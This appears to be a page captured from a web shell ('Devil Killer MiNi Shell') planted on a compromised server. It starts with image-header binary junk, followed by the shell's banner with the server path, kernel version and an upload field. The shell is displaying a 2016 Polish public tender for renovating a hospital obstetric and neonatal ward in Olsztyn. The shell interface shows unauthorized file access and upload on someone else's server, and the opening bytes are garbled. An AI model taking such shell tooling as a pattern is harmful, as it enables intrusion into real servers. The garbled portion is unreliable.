JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160223/40134-N-2016.html

<p class="kh_header"><b>Olsztyn: REMONT I PRZEBUDOWA ODDZIAŁU POŁOŻNICZEGO Z POMIESZCZENIAMI DLA NOWORODKÓW I WCZEŚNIAKÓW ORAZ TRAKTEM PORODOWYM W MIEJSKIM SZPITALU ZESPOLONYM PRZY UL. NIEPODLEGŁOŚCI 44 W OLSZTYNIE</b><br>
<b>Numer ogłoszenia: 40134 - 2016; data zamieszczenia: 23.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT I PRZEBUDOWA ODDZIAŁU POŁOŻNICZEGO Z POMIESZCZENIAMI DLA NOWORODKÓW I WCZEŚNIAKÓW ORAZ TRAKTEM PORODOWYM W MIEJSKIM SZPITALU ZESPOLONYM PRZY UL. NIEPODLEGŁOŚCI 44 W OLSZTYNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> REMONT I PRZEBUDOWA ODDZIAŁU POŁOŻNICZEGO Z POMIESZCZENIAMI DLA NOWORODKÓW I WCZEŚNIAKÓW ORAZ TRAKTEM PORODOWYM W MIEJSKIM SZPITALU ZESPOLONYM PRZY UL. NIEPODLEGŁOŚCI 44 W OLSZTYNIE
1. Inwestycja dofinansowana ze środków Mechanizmu Finansowego EOG 2009- 2014 i Norweskiego Mechanizmu Finansowego 2009-2014. Umowa nr 022/300/7/MF EOG NMF /2014/00/638/1065 w sprawie Projektu NR 300/07/13 pt.Poprawa opieki perinatalnej gwarancją zdrowia społeczności subregionu olsztyńskiego. 
2.	Informacje ogólne
Wykonanie robót na podstawie Umowy oraz:
1.	Pozwolenia na budowę;
2.	Projektu budowlanego i wykonawczego;
3.	Specyfikacji;
4.	Przedmiarów robót, jako dokumentu pomocniczego na prace pozostające do wykonania i zakończenia remontu i przebudowy.
UWAGA !
WYKONAWCA POWINIEN W KALKULACJI OFERTY UWZGLĘDNIĆ FAKT ŻE PRACE REMONTOWE PROWADZONE BĘDĄ W BUDYNKU CZYNNEGO SZPITALA. NA POCZĄTKU  REALIZACJI  INWESTOR UDOSTĘPNI  II  PIĘTRO DO REALIZACJI REMONTU I PO PRZEKAZANIU  DO UŻYTKOWANIA  INWESTOR UDOSTĘPNI III  PIĘTRO DO PRZEBUDOWY I REMONTU. 
Przed złożeniem ofert Zamawiający zaleca dokonania wizji lokalnej obiektu.
Obecnie do zakończenia remontu na II piętrze pozostały do wykonania roboty:
Budowlane: poprawa usterek w łazienkach tj. wymiana źle ułożonych i poprawie fugowania ścian, ponadto uzupełnienie elementów ochronnych na ścianach i narożnikach, naprawa ubytków w stopniach klatki schodowej powstałych podczas transportu i składowania materiałów.
Sanitarne: dostawa i montaż armatury sanitarnej, dostawa i montaż medycznych paneli nadłóżkowych oraz sufitowo-mostowych, dostawa i montaż klimatyzatorów.   
Elektryczne: dostawa i montaż opraw oświetleniowych, gniazd i włączników  pomiarów. Ponadto należy uwzględnić konieczność przełożenia nowych kabli na niskim parterze, powyżej podciągów, bezpośrednio pod stropem.
	Ze względu na ograniczoną powierzchnię terenu pod zagospodarowanie placu budowy Wykonawca musi uwzględnić utrudnienia w składowaniu materiałów budowlanych i konieczność wywożenia gruzu, odpadów ,materiałów z rozbiórki na bieżąco do utylizacji bez czasowego składowania na terenie Szpitala. Przy prowadzonych robotach rozbiórkowych przewidzieć zabezpieczenie pomieszczeń użytkowanych przez Szpital przed zapyleniem.
	Pomieszczenia objęte opracowaniem mieszczą się na II i III piętrze w Pawilonie Ginekologiczno - Położniczym połączonym przejściami z głównym budynkiem Szpitala Miejskiego.
      Oddział Położniczy z pomieszczeniami dla noworodków i wcześniaków zlokalizowany jest na II  piętrze budynku. Powierzchnia użytkowa tego oddziału wynosi 448.60 m2.
 Na oddziale tym zaprojektowano salę na 5 stanowisk intensywnej opieki noworodków i wcześniaków poprzedzoną śluzą  umywalkowo- fartuchową. 7 sal chorych z łazienkami o łącznej liczbie 12 łóżek oraz szereg niezbędnych, specjalistycznych pomieszczeń. We wszystkich pomieszczeniach na II piętrze przewidziano wentylację grawitacyjną  oraz dodatkowo klimatyzatory.
       Trakt porodowy z salą cięć cesarskich i pozostałymi pomieszczeniami zlokalizowany jest na III piętrze budynku .Powierzchnia użytkowa tego oddziału wynosi 355,50 m2. 
 Na tej kondygnacji  planuje się wykonanie remontu pomieszczeń w zakresie; wykonanie śluzy umywalkowo- fartuchowej przed wejściem na trakt porodowy, zmianę lokalizacji sali cięć cesarskich ze względu na poprawienie funkcjonalności względem pozostałych pomieszczeń, wykonanie 4 sal porodowych.
Ponadto przewidziano: pokoje przygotowawcze lekarzy , pomieszczenia socjalne, łazienkę personelu, brudownik i pomieszczenie porządkowe. We wszystkich pomieszczeniach na III piętrze zastosowana będzie mechaniczna wentylacja  nawiewno-wywiewna . W sali cięć cesarskich zastosowany będzie strop laminarny.
 Zakres prac budowlanych
Ściany:
wypełnienia ściany zewnętrznej, po zamurowaniu okien klatki schodowej, jako ściany warstwowe z bloczka betonu komórkowego z izolacją termiczną i tynkiem cienkowarstwowym. Część otworów jest zabudowana bez izolacji termicznej i uzupełnienia elewacji. 
Ściany samonośne wewnętrzne:
 wykonane będą z bloczków betonu komórkowego o grubości 12 cm z odmian 600 i 500.
W miejscach przeszkleń wbudowanych w ścianę i nad drzwiami wykonać ścianę w lekkiej zabudowie wykonanej z płyt gipsowo - włóknowych na szkielecie  stalowym z wypełnieniem wełną mineralną o całkowitej grubości 10 cm. 
Wszystkie ściany wewnętrzne ( również przeszklone ) powinny spełniać odpowiednią klasę odporności ogniowej dla budynku B (tj. min. EI 30).
Tynki:
 Należy wyrównać płaszczyzny ścian i wykonać uzupełnienia ubytków ścian i stropów zatartą na gładko masą do wykonywania gładzi gipsowych, produkowaną na bazie mączki anhydrytowej z wypełniaczami. Oraz dodatkami modyfikującymi. 
Posadzki i izolacje przeciwwilgociowe: 
podłogi we wszystkich pomieszczeniach należy skuć istniejące warstwy posadzkowe, powierzchnię oczyścić i wyrównać. Wykonać wylewkę samopoziomującą  na  warstwie gruntującej. We wszystkich pomieszczeniach mokrych należy wykonać izolację przeciwwilgociową.
Posadzki - wykładzina: 
należy wykonać z materiałów umożliwiających ich mycie i dezynfekcję. Prace wykonywać zgodnie z projektem i warunkami technicznymi wykonania i odbioru robót.
Posadzki z płytek ceramicznych z gresu :
Wykonać z materiałów umożliwiających ich mycie i dezynfekcję. Dostosować do wymagań szczegółowo opisanych w projekcie. Odstępstwo nie jest możliwe bez uzgodnień z Projektantem. 
Wykończenie ścian wewnętrznych:
Projektowanie pomieszczenia gabinetów  zabiegowych, sal porodowych, sal noworodków etc. - malowanie ,ścian farbą bakteriobójczą na tapecie z włókna szklanego. Projektowane pomieszczenia, korytarze, części wspólne, ciągi komunikacyjne - malowanie ścian farbą bakteriobójczą na tapecie z włókna szklanego.
Projektowane pomieszczenia biurowe, magazynowe, porządkowe i gospodarcze malować zgodnie z projektem tak co do materiałów malarskich jak i kolorystyki.
Wykończenie ścian płytkami:
Projektuje się skucie istniejącej glazury oraz wyrównanie istniejących powierzchni i wg oznaczeń na rysunkach ,projektuje się nowe okładziny z gresu.
Dostosować się do projektu kolorystyki. Każda zmiana jednego z koloru powoduje zmianę innych kolorów o zadanym zakresie projektu co należy skonsultować z projektantem.
Sufity podwieszane:
Systemowy sufit podwieszany wykonać w klasie odporności na korozję C3 o łącznej przybliżonej wadze 2,5 kg. Sufity należy wykonać w sposób zapewniający szczelność powierzchni   oraz umożliwiający ich mycie i dezynfekcję.
Przewiduje się zabudowę nowych instalacji kablowych oraz przewodów instalacji gazów medycznych przebiegających na terenie budynku poza II i III piętrem.
Stolarka:
Pozostające do wykonania drzwi wewnętrzne, pełne, przeszklone, witryny - ścianki szklane, szklenie w ścianie, okna i drzwi przeszklone(przezroczyste), wykonać dokładnie zgodnie z projektem.
            Zakres prac sanitarnych
Zakres prac sanitarnych na II piętrze:
wykonanie białego montażu;
wykonanie instalacji c.o. - montaż głowic termostatycznych;
1.	wykonanie instalacji wentylacji mechanicznej wywiewnej;
2.	wykonanie instalacji klimatyzacji pomieszczeń;
3.	wykonanie instalacji gazów medycznych oraz instalacji sygnalizacji świetlno-akustycznej - dokończenie instalacji, rozruch i poddanie instalacji próbom;
4.	montaż medycznych paneli nadłóżkowych oraz sufitowo-mostowych;
Zakres prac sanitarnych na III piętrze i  kondygnacjach powiązanych:
demontaż istniejących elementów instalacji grzewczej, wodnej i kanalizacyjnej, instalacji klimatyzacji, instalacji gazów medycznych;
wykonanie instalacji kanalizacji;
wykonanie instalacji ciepłej i zimnej wody użytkowej, cyrkulacji;
wykonanie białego montażu;
wykonanie instalacji c.o.;
dokończenie instalacji ciepła technologicznego - doprowadzenie instalacji do nagrzewnic w centralach wentylacyjnych, napełnienie instalacji glikolem, regulacja, próby i uruchomienie;
wykonanie instalacji obiegu glikolowego wymiennika odzysku ciepła centrali wentylacyjnej;
wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej układów N1W1, N2W2;
wykonanie instalacji wentylacji mechanicznej wywiewnej;
wykonanie instalacji klimatyzacji pomieszczeń;
wykonanie instalacji nadciśnienia klatek schodowych;
wykonanie instalacji gazów medycznych oraz instalacji sygnalizacji świetlno-akustycznej;
montaż medycznych paneli nadłóżkowych oraz sufitowo-mostowych;
UWAGA: Wszystkie instalacje należy wykonać zgodnie z Projektem Wykonawczym branży sanitarnej, uwzględniając wykonane prace w części  instalacji i zamontowanego wyposażenia!
Przedmiotowa część budynku, posiada instalację grzewczą, zwu cwu cyrk oraz kanalizacji sanitarnej. Występują lokalne klimatyzatory typu Split
	Instalacja kanalizacji sanitarnej:
Włączenia do istniejących instalacji KS, należy wykonać poprzez trójniki i mufkę połączeniową PVC, a w przypadku żeliwa, specjalne przejście żeliwo-PVC.
W budynku zaprojektowano instalację kanalizacyjną z rur PP-HT o połączeniach kielichowych z uszczelkami gumowymi
1.	Instalacja kanalizacji sanitarnej prowadzona będzie do istniejącej sieci kanalizacji sanitarnej poprzez istniejące przyłącza kanalizacyjne.
	Instalacja wody zimnej, ciepłej i użytkowej:
1)	Instalację zwu/cwu/cyrk. należy wykonać z: rur wielowarstwowych PE-RT Al PE-RT  przeznaczone do instalacji wody zimnej o parametrach 20 °C i ciśnieniu 10 bar, ciepłej użytkowej o parametrach 70 °C i ciśnieniu 10 bar)
1.	Jako izolację rurociągów należy stosować izolację z pianki poliuretanowej
Instalacja centralnego ogrzewania i ciepła technologicznego:
2.	Instalacja ciepła technologicznego realizowana będzie z istniejących rozdzielaczy, poprzez wymiennik glikol/woda.
1.	Zaprojektowano grzejniki stalowe płytowe higieniczne
2.	Projekt przewiduje wykonanie układu ciepła technologicznego na obiegu glikolowym (glikol propylenowy 42%)
	Instalacja chłodzenia pomieszczeń:
6.	zaprojektowano urządzenia Multisplit oraz systemy Split.
1.	Instalacja freonowa realizowana będzie z rur miedzianych chłodniczych łączonych poprzez lutowanie.
2.	Zaprojektowano 2  centrale wentylacyjne
3.	Projekt przewiduje wentylację mechaniczną wywiewną dla pomieszczeń WC i pomieszczeń pomocniczych.
1.	Projekt przewiduje wentylację mechaniczną nawiewno-wywiewną dla pomieszczeń biurowych i porodowych kondygnacji III piętra
Projekt przewiduje wentylację mechaniczną nawiewno-wywiewną dla pomieszczeń Sali cięć cesarskich oraz pomieszczeń pomocniczych przy Sali.
1.	Czerpnie zlokalizowane zostały ponad dachem
Wyrzutnie zostały zlokalizowane jako zintegrowane z centralą
Zakres prac elektrycznych
W remontowanych pomieszczeniach należy wykonać następujące instalacje:
2.	instalacja oświetlenia i gniazd wtyczkowych ogólnego przeznaczenia   
3.	instalacje oświetlenia awaryjnego 
4.	instalację oświetlenia nocnego 
5.	oświetlenie ewakuacyjne  ( niezależne obwody )
6.	instalację nadzoru opraw oświetlenia awaryjnego i ewakuacyjnego
7.	instalacja siłowa 
8.	instalacja odgromowa
9.	instalacja zasilania obwodów  pomieszczeń medycznych grupy 2 - instalacje obejmują obwody w Sali Cięć Cesarskich, Sal porodowych, Sali pooperacyjnej oraz Sali przygotowania pacjenta. Odbiory należy zasilić z modułów zasilająco- sterujących firmy BENDER ( rozbudowa istniejącego systemu ) poprzez transformatory i UPS. Moduły należy połączyć z konwerterem , który należy zainstalować w szafie krosowej znajdującej się w pomieszczeniu Centrali Telefonicznej
10.	instalację wyrównawczą
11.	instalację zasilania sygnalizatorów gazów medycznych
12.	instalację sygnalizacji pożaru 
13.	instalację przyzywową w niezbędnym zakresie ( instalacja typu ACCERMAN - rozbudowa istniejącego w Szpitalu systemu ). 
14.	instalację sieci LAN
15.	instalacja telefoniczna
16.	przebudować Główną Rozdzielnię elektryczną budynku
17.	wykonać instalację wraz z wyłącznikami ppoż
18.	tablice rozdzielcze obwodów podstawowych i rezerwowanych
19.	instalacja kontroli dostępu
20.	wykonanie pomiarów elektrycznych
21.	wykonanie pomiarów instalacji LAN
Wszystkie instalacje należy wykonać zgodnie z Projektem Wykonawczym branży elektrycznej, uwzględniając wykonane prace w części  instalacji i zamontowanego wyposażenia:
 Trasy kablowe - wykonane: szacht kablowy, niski parter i II piętro
  WLZ - kable ułożone częściowo (pozostawione zapsy na klatce schodowej do zasilenia tablic i urządzeń III i IV  piętra, brak pomiarów)
  Rozdzielnice NN :
  RG -  niekompletna: brak podłączenia części obwodów, brak wkładek bezpiecznikowych, niekopletne osłony, brak  protokółów pomiarowych i sprawdzenia poprawności działania SZR-u, brak opisów i schematów, w pomieszczeniu rozdzielni brak instalacji oświetleniowej
  T2U1 - rozdzielnica nie kompletna: nie podłączona pod zasilanie, brak pomiarów opisów i schematów
  TUPS1 i TUPS2 - rozdzielnice nie kompletne: nie podłączone pod zasilanie, brak osłon, wkładek bezpiecznikowych, opisów i schematów
 UPS1-TIT1 i UPS2-TIT2 - UPS-y niekompletne: nie podłączone pod zasilanie, brak systemu monitoringu, brak instalacji połączeniowej z bateriami, brak instalacji łączącej z rozdzielnicami TUPS1 i TUPS2, brak opisów i schematów
 TIT1 i TIT2 - nie kompletne: nie podłączone pod zasilanie, nie podłączone wszystkie obwody, brak opisów i schematów
 Instalacja oświetlenia podstawowego  - okablowane II piętro, zainstalowane oprawy oświetleniowe nadumywalkowe i plafony okrągłe, wstawione puszki instalacyjne pod łączniki, brak pomiarów
 Instalacja oświetlenia awaryjnego - wstawiona cetralna bateria z bateriami (brak zasilania rozdzielni baterie nie podłączone, brak podcentrali na III piętrze), okablowane: ciągi komunikacyjne ( niski parter, parter, piętro I),  II piętro, obie klatki schodowe i pomieszczenie maszynowni dźwigu, oprawy zainstalowane na klatkach schodowych, ciągach komunikacyjnych niskiego parteru, parteru i I piętra ( wymagają zainstalownia puszk PIP i dołożenia po 50 cm przewodu celem przeniesienia ich na sufit podwieszny )
Instalacja gniazd wtykowych, siłowa, obwody ppoż - instalacje gniazd wtykowych i  siłową wykonano okablowanie wraz z montażem puszek instalacyjnych na II piętrze, obwody ppoż. wykonano okablowanie II piętra i niskiego parteru.
 Instalacja przyzywowa - wykonane okablowanie II piętra
 Instalacja odgromowa i wyrównawcza - wykonano okablowanie instalacji wyrównawczej na II piętrze
   SAP - wykonano okablowanie i montaż gniazd czujek ppoż na klatkach schodowych, ciągach komunikacyjnych  niskiego parteru, parteru i I piętra oraz całego II piętra, zainstalowano 3 centralki RZN-4404, bez podłączenia przewodów
 Kontrola dostępu - wykonano okablowanie za wyjątkiem III piętra
  Okablowanie strukturalne wraz z urządzeniami - wykonane okablowanie ( przewody na III piętro pozostawione zapasy do ułożenia docelowego, wstawiona szafa krosowa niekompletna.
Uwaga!
A.	Należy przewidzieć roboty i prace nie objęte zakresem opracowanego projektu, a konieczne do utrzymania w pełnej sprawności instalacji istniejących na kondygnacjach nie wchodzących w zakres  remontu. Związane jest to z przepięciem istniejących instalacji do urządzeń i rozdzielni nowoprojektowanych.
B.	Ilekroć w dokumentacji projektowej wskazano producenta materiałów lub są użyte nazwy handlowe produktów, które zaleca się stosować do realizacji przedmiotu zamówienia, oznacza to, iż wskazano przykładowe wyroby i parametry lub właściwości minimalne jakim ma odpowiadać dany produkt. W takich przypadkach przy sporządzaniu oferty stosować należy zasadę równoważności dla tych produktów.  

Materiały równoważne
Zamawiający dopuszcza zaoferowanie materiałów równoważnych, tj. materiałów o nie gorszych 
i odpowiadających parametrom jakościowym materiałom wyszczególnionym w dokumentacji przetargowej, różniącym się od wskazanych jedynie nazwą. Wykonawca, który będzie powoływał się na rozwiązania równoważne opisywanym przez Zamawiającego, zgodnie z art. 30 ust. 5 ustawy, jest obowiązany wykazać na etapie przetargu, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego. 
3.	Szczegółowy zakres robót określają przedmiary robót i dokumentacja projektowa - załącznik nr 3 do SIWZ
4.	Szczegółowe zasady realizacji zamówienia określa załącznik nr 2 do SIWZ - projekt umowy.
5.	Informacja dotycząca obowiązku osobistego wykonania przez wykonawcę kluczowych części
zamówienia: 
5.1.	Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowych części zamówienia z zakresu robót ogólnobudowlanych i wykończeniowych tj.
Przedmiar robót branży budowlanej:
1.Element nr 1 - Roboty rozbiórkowe i wyburzeniowe;
2. Element nr 2 - Nadproża i elementy konstrukcyjne;
3. Element nr 4 - Ścianki działowe murowane, zamurowania otworów;
4. Element nr 5 - Ścianki z płyt gipsowo-włóknowych i wykończenie powierzchni;
5. Element nr 10 - Zamurowania otworów okiennych i wykończenie wewn. i zewn - na klatce schodowej;
6. Element 11 - Wyposażenie pomieszczeń sanitarnych - wg zestawienia w PT Architektury;
7. Elementy przedmiaru Branża elektryczna i budowlana - obudowy instalacji, malowanie, szpachlowanie
5.2.	Zamawiający dopuszcza wykonanie wyszczególnionych robót poniżej przez Podwykonawców:
Przedmiar robót branży budowlanej:
1.  Element nr 3 - Podłoża i posadzki;
2.  Element nr 6 - Stolarka drzwiowa, ślusarka drzwiowa i okienna;
3.  Element nr 7 -  Stropy podwieszane , systemowe.
4.  Element nr 8 - Tynki i okładziny wewnętrzne;
5.  Element nr 9 - Malowanie pomieszczeń (z podziałem);
6. W całości przedmiar robót branży sanitarnej tj. instalacje wod-kan, co, c.t., wentylacji mechanicznej i klimatyzacji, gazów medycznych oraz branży elektrycznej i niskoprądowej może być realizowany przez Podwykonawców..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.40-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium .
2.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 55 000,00 zł 
(słownie: pięćdziesiąt pięć tysięcy złotych)
3.	Wykonawca wnosi wadium: 
-	w pieniądzu, poleceniem przelewu na konto: 
Miejskiego Szpitala Zespolonego w Olsztynie, ul. Niepodległości 44, nr konta 08 1440 1228 0000 0000 0189 0786 z dopiskiem: wadium w  przetargu DZZ-382- 12/16
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
-	w gwarancjach ubezpieczeniowych
-	w gwarancjach bankowych
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z p. zm.) sposób przekazania: przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w
postępowaniu.W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust.1 zamawiający żąda oświadczenia z art. 22 ust. 1 pkt. 1-4
o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający na potwierdzenie spełniania tego warunku wymaga posiadania niezbędnej
wiedzy i doświadczenia w zakresie realizacji minimum trzech robót odpowiadającej
rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 1 000 000,00 PLN (słownie: jeden milion złotych brutto) każda robota. Zamawiający wymaga, aby roboty te dotyczy obiektów użyteczności publicznej. Ocena spełniania ww.
warunku nastąpi na podstawie dokumentów o których mowa w rozdziale VI. lit A. pkt.1 ppkt.1.2 specyfikacji istotnych warunków zamówienia tj.: 1.2. Wykazu minimum trzech robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający wymaga, aby roboty te dotyczyły
obiektów użyteczności publicznej.
